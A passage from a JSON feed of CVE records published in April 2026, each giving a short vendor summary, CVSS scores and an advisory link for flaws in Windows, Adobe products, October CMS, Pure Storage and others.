If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27245","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26179","summary":"Double free in Windows Kernel allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26179"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26180","summary":"Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges 
locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26180"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26181","summary":"Use after free in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26181"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26182","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26182"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26176","summary":"Heap-based buffer overflow in Windows Client Side Caching driver (csc.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26176"],"published_time":"2026-04-14T18:16:53","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26177","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate 
privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26177"],"published_time":"2026-04-14T18:16:53","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26178","summary":"Integer size truncation in Windows Advanced Rasterization Platform (WARP) allows an unauthorized attacker to elevate privileges locally.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26178"],"published_time":"2026-04-14T18:16:53","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26173","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26173"],"published_time":"2026-04-14T18:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26174","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Server Update Service allows an authorized attacker to elevate privileges 
locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26174"],"published_time":"2026-04-14T18:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26175","summary":"Use of uninitialized resource in Windows Boot Manager allows an unauthorized attacker to bypass a security feature with a physical attack.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26175"],"published_time":"2026-04-14T18:16:52","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26170","summary":"Improper input validation in Microsoft PowerShell allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26170"],"published_time":"2026-04-14T18:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26171","summary":"Uncontrolled resource consumption in .NET allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26171"],"published_time":"2026-04-14T18:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26172","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows 
an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26172"],"published_time":"2026-04-14T18:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26166","summary":"Double free in Windows Shell allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26166"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26167","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26167"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26168","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges 
locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26168"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26169","summary":"Buffer over-read in Windows Kernel Memory allows an authorized attacker to disclose information locally.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26169"],"published_time":"2026-04-14T18:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26162","summary":"Access of resource using incompatible type ('type confusion') in Windows OLE allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26162"],"published_time":"2026-04-14T18:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26163","summary":"Double free in Windows Kernel allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26163"],"published_time":"2026-04-14T18:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26165","summary":"Use after free in Windows Shell allows an authorized attacker to elevate privileges 
locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26165"],"published_time":"2026-04-14T18:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26159","summary":"Missing authentication for critical function in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26159"],"published_time":"2026-04-14T18:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26160","summary":"Missing authentication for critical function in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26160"],"published_time":"2026-04-14T18:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26161","summary":"Untrusted pointer dereference in Windows Sensor Data Service allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26161"],"published_time":"2026-04-14T18:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26155","summary":"Microsoft Local Security Authority Subsystem Service Information 
Disclosure Vulnerability","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26155"],"published_time":"2026-04-14T18:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26156","summary":"Heap-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26156"],"published_time":"2026-04-14T18:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26152","summary":"Insecure storage of sensitive information in Windows Cryptographic Services allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26152"],"published_time":"2026-04-14T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26153","summary":"Out-of-bounds read in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26153"],"published_time":"2026-04-14T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26154","summary":"Improper input validation in Windows Server Update Service allows an unauthorized attacker to perform 
tampering over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26154"],"published_time":"2026-04-14T18:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24906","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a Stored Cross-Site Scripting (XSS) vulnerability in the Backend Editor Settings. The Markup Classes fields (used for paragraph styles, inline styles, table styles, etc.) did not sanitize input to valid CSS class name characters. Malicious values were rendered unsanitized in Froala editor dropdown menus, allowing JavaScript execution when any user opened a RichEditor. Exploitation could lead to privilege escalation if a superuser opens any RichEditor during routine content editing (e.g., editing a blog post), and requires authenticated backend access with editor settings permissions. This issue has been fixed in versions 3.7.14 and 4.1.10. To workaround this issue, restrict editor settings permissions to fully trusted administrators only","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-6qmh-j78v-ffp7"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24907","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a stored cross-site scripting (XSS) vulnerability in the Event Log mail preview feature. 
When viewing logged mail messages, HTML content was rendered in an iframe without proper sandboxing, allowing JavaScript execution in the viewer's browser context. This issue has been fixed in versions 3.7.14 and 4.1.10. If users are unable to update immediately, workarounds include restricting mail template editing permissions to fully trusted administrators only and restricting Event Log viewing permissions to minimize exposure.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-j4j5-9x6g-rgxc"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25184","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Applocker Filter Driver (applockerfltr.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-25184"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26143","summary":"Improper input validation in Microsoft PowerShell allows an unauthorized attacker to bypass a security feature locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26143"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26149","summary":"Improper neutralization of escape, meta, or control sequences in Microsoft Power Apps allows an authorized 
attacker to bypass a security feature over a network.","cvss":9.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26149"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26151","summary":"Insufficient ui warning of dangerous operations in Windows Remote Desktop allows an unauthorized attacker to perform spoofing over a network.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26151"],"published_time":"2026-04-14T18:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23653","summary":"Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an authorized attacker to disclose information over a network.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23653"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23657","summary":"Use after free in Microsoft Office Word allows an unauthorized attacker to execute code 
locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23657"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23666","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in .NET Framework allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23666"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23670","summary":"Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23670"],"published_time":"2026-04-14T18:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20930","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges 
locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20930"],"published_time":"2026-04-14T18:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20945","summary":"Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20945"],"published_time":"2026-04-14T18:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21331","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. 
Scope is changed.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0390","summary":"Reliance on untrusted inputs in a security decision in Windows Boot Loader allows an authorized attacker to bypass a security feature locally.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0390"],"published_time":"2026-04-14T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20806","summary":"Access of resource using incompatible type ('type confusion') in Windows COM allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20806"],"published_time":"2026-04-14T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-20928","summary":"Improper removal of sensitive information before storage or transfer in Windows Recovery Environment Agent allows an unauthorized attacker to bypass a security feature with a physical attack.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20928"],"published_time":"2026-04-14T18:16:42","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-70023","summary":"An issue 
pertaining to CWE-843: Access of Resource Using Incompatible Type was discovered in transloadit uppy v0.25.6.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/zcxlighthouse/27926a85371ac5d2291f44903254753e","https://github.com/transloadi","https://github.com/transloadit/uppy"],"published_time":"2026-04-14T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0207","summary":"A vulnerability exists in FlashBlade whereby sensitive information may be logged under specific conditions.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.5,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html"],"published_time":"2026-04-14T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0209","summary":"Under certain administrative conditions, FlashArray Purity may apply snapshot retention policies earlier or later than configured.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html"],"published_time":"2026-04-14T18:16:41","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34622","summary":"Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/acrobat/apsb26-44.html"],"published_time":"2026-04-14T17:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34626","summary":"Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary file system read in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/acrobat/apsb26-44.html"],"published_time":"2026-04-14T17:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27284","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27285","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application or disrupt its functionality. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27286","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27291","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27238","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27283","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T17:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22692","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.13 and versions 4.0.0 through 4.1.4 contain a sandbox bypass vulnerability in the optional Twig safe mode feature (CMS_SAFE_MODE). Certain methods on the collect() helper were not properly restricted, allowing authenticated users with template editing permissions to bypass sandbox protections. Exploitation requires authenticated backend access with CMS template editing permissions and only affects installations with CMS_SAFE_MODE enabled (disabled by default). This issue has been fixed in versions 3.7.13 and 4.1.5. 
